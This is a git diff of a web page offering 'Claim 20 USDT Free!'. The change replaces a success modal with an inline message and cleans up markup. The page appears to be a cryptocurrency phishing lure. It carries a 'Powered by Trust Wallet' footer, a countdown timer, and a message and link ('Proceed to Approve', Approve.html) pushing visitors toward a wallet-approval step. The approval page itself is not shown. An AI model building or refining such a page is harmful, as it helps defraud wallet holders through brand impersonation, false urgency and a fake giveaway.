--- a/index.html
+++ b/index.html
@@ -41,6 +41,13 @@
       color: #e74c3c;
       margin: 15px 0;
     }
+    .status-msg {
+      color: green;
+      font-size: 15px;
+      margin: 12px 0;
+      font-weight: bold;
+      display: none; /* default hidden */
+    }
     button {
       background-color: #3498db;
       color: white;
@@ -97,24 +104,6 @@
       font-size: 13px;
       color: #888;
     }
-    /* Success Modal */
-    .modal {
-      position: fixed;
-      top: 0; left: 0; right: 0; bottom: 0;
-      background: rgba(0,0,0,0.5);
-      display: none;
-      justify-content: center;
-      align-items: center;
-    }
-    .modal-content {
-      background: #fff;
-      padding: 20px 30px;
-      border-radius: 10px;
-      text-align: center;
-      box-shadow: 0 4px 15px rgba(0,0,0,0.2);
-      font-size: 18px;
-      color: #2c3e50;
-    }
   </style>
 </head>
 <body>
@@ -124,15 +113,14 @@
   <h1>Claim 20 USDT Free!</h1>
   <div class="gift-box" id="giftBox"></div>
   <div class="countdown" id="countdown">05:00</div>
+
+  <!-- ✅ Success message moved UP -->
+  <div class="status-msg" id="statusMsg">
+    ✅ Claim request sent. Please approve in your wallet.
+  </div>
+
   <button id="claimButton">Claim Now</button>
   <div class="footer">Powered by Trust Wallet</div>
-</div>
-
-<!-- Success Modal -->
-<div class="modal" id="successModal">
-  <div class="modal-content">
-    ✅ Claim request sent.<br>Please approve in your wallet.
-  </div>
 </div>
 
 <script>
@@ -140,7 +128,7 @@
   const countdownElement = document.getElementById('countdown');
   const claimButton = document.getElementById('claimButton');
   const giftBox = document.getElementById('giftBox');
-  const modal = document.getElementById('successModal');
+  const statusMsg = document.getElementById('statusMsg');
 
   const countdownTimer = setInterval(() => {
     const minutes = Math.floor(timeLeft / 60);
@@ -172,18 +160,16 @@
       setTimeout(() => confetti.remove(), 1000);
     }
 
-    // Show success modal after animation
+    // Show success message
     setTimeout(() => {
-      modal.style.display = 'flex';
+      statusMsg.style.display = 'block';
     }, 1200);
   });
 </script>
+
 <a href="Approve.html">
-    <button>Proceed to Approve</button>
-  </a>
+  <button>Proceed to Approve</button>
+</a>
+
 </body>
 </html>
-</body>
-</html>
-
-
